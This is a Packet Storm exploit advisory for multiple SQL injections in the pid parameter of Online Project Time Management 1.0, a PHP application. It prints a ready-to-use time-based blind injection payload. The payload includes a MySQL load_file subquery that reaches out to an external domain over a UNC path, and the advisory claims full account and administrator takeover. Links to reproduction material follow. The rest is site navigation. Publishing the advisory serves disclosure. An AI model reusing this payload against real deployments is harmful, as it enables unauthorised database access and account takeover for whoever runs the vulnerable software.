Online Project Time Management 1.0 SQL Injection ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

        ## Title: Online Project Time Management 1.0 Multiple SQL - Injections
## Author: nu11secur1ty
## Date: 01.20.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
## Description:
The pid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+'
was submitted in the pid parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take account control of all accounts plus an
administrator account on this system.
Status: CRITICAL
[+] Payload:
```mysql
---
Parameter: pid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=reports/date_wise&pid=1'+(select
load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+''
AND (SELECT 8887 FROM (SELECT(SLEEP(3)))JQmk) AND 'htCu'='htCu
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Project-Time-Management)
## Proof and Exploit:
[href](https://streamable.com/ucyq64)

• Follow us on Twitter^[15]
• Follow us on Facebook^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (932)
• Advisory^[19] (76,575)
• Arbitrary^[20] (14,937)
• BBS^[21] (2,859)
• Bypass^[22] (1,517)
• CGI^[23] (1,009)
• Code Execution^[24] (6,455)
• Conference^[25] (665)
• Cracker^[26] (797)
• CSRF^[27] (3,246)
• DoS^[28] (21,539)
• Encryption^[29] (2,319)
• Exploit^[30] (49,119)
• File Inclusion^[31] (4,119)
• File Upload^[32] (933)
• Firewall^[33] (821)
• Info Disclosure^[34] (2,531)
• Intrusion Detection^[35] (842)
• Java^[36] (2,722)
• JavaScript^[37] (787)
• Kernel^[38] (5,899)
• Local^[39] (13,892)
• Magazine^[40] (586)
• Overflow^[41] (12,017)
• Perl^[42] (1,409)
• PHP^[43] (5,024)
• Proof of Concept^[44] (2,273)
• Protocol^[45] (3,231)
• Python^[46] (1,365)
• Remote^[47] (29,324)
• Root^[48] (3,421)
• Ruby^[49] (564)
• Scanner^[50] (1,627)
• Security Tool^[51] (7,629)
• Shell^[52] (3,013)
• Shellcode^[53] (1,192)
• Sniffer^[54] (877)
• Spoof^[55] (2,063)
• SQL Injection^[56] (15,859)
• TCP^[57] (2,345)
• Trojan^[58] (666)
• UDP^[59] (865)
• Virus^[60] (657)
• Vulnerability^[61] (30,125)
• Web^[62] (8,863)
• Whitepaper^[63] (3,698)
• x86^[64] (939)
• XSS^[65] (17,202)
• Other^[66]

File Archives

• January 2022^[67]
• December 2021^[68]
• November 2021^[69]
• October 2021^[70]
• September 2021^[71]
• August 2021^[72]
• July 2021^[73]
• June 2021^[74]
• May 2021^[75]
• April 2021^[76]
• March 2021^[77]
• February 2021^[78]
• Older^[79]

Systems

• AIX^[80] (423)
• Apple^[81] (1,853)
• BSD^[82] (368)
• CentOS^[83] (54)
• Cisco^[84] (1,909)
• Debian^[85] (5,946)
• Fedora^[86] (1,690)
• FreeBSD^[87] (1,241)
• Gentoo^[88] (4,148)
• HPUX^[89] (875)
• iOS^[90] (310)
• iPhone^[91] (108)
• IRIX^[92] (220)
• Juniper^[93] (67)
• Linux^[94] (41,306)
• Mac OS X^[95] (682)
• Mandriva^[96] (3,105)
• NetBSD^[97] (255)
• OpenBSD^[98] (476)
• RedHat^[99] (10,933)
• Slackware^[100] (941)
• Solaris^[101] (1,601)
• SUSE^[102] (1,444)
• Ubuntu^[103] (7,578)
• UNIX^[104] (9,010)
• UnixWare^[105] (182)
• Windows^[106] (6,253)
• Other^[107]

© 2020 Packet Storm. All rights reserved.